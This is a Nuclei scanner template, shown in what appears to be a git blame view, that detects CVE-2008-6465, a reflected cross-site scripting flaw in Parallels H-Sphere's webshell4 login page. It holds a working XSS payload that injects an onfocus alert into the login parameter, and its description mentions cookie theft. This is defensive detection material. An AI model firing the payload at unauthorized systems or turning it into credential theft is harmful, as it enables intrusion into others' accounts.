nuclei-templates/http/cves/2008/CVE-2008-6465.yaml

48 lines
1.5 KiB
YAML
Raw Normal View History

2022-11-06 12:41:14 +00:00
id: CVE-2008-6465
info:
name: Parallels H-Sphere 3.0.0 P9/3.1 P1 - Cross-Site Scripting
2022-11-06 12:41:14 +00:00
author: edoardottt
severity: medium
description: |
Parallels H-Sphere 3.0.0 P9 and 3.1 P1 contains multiple cross-site scripting vulnerabilities in login.php in webshell4. An attacker can inject arbitrary web script or HTML via the err, errorcode, and login parameters, thus allowing theft of cookie-based authentication credentials and launch of other attacks.
2022-11-06 12:41:14 +00:00
reference:
- http://www.xssing.com/index.php?x=3&y=65
- https://exchange.xforce.ibmcloud.com/vulnerabilities/45254
- https://exchange.xforce.ibmcloud.com/vulnerabilities/45252
2022-11-12 07:20:30 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2008-6465
2022-11-06 12:41:14 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
2022-11-06 12:41:14 +00:00
cve-id: CVE-2008-6465
cwe-id: CWE-80
2022-11-12 02:32:13 +00:00
metadata:
2022-11-12 07:20:30 +00:00
verified: true
shodan-query: title:"Parallels H-Sphere
tags: cve,cve2008,xss,parallels,h-sphere
2022-11-06 12:41:14 +00:00
http:
2022-11-12 02:32:13 +00:00
- method: GET
path:
- '{{BaseURL}}/webshell4/login.php?errcode=0&login=\%22%20onfocus=alert(document.domain);%20autofocus%20\%22&err=U'
2022-11-06 12:41:14 +00:00
matchers-condition: and
matchers:
- type: word
2022-11-12 02:32:13 +00:00
part: body
2022-11-06 12:41:14 +00:00
words:
2022-11-12 02:32:13 +00:00
- '\" onfocus=alert(document.domain); autofocus'
- 'Please enter login name & password'
2022-11-12 02:37:51 +00:00
condition: and
2022-11-06 12:41:14 +00:00
- type: word
2022-11-12 02:32:13 +00:00
part: header
2022-11-06 12:41:14 +00:00
words:
2022-11-12 02:32:13 +00:00
- 'text/html'
- type: status
status:
- 200
# Enhanced by md on 2022/12/08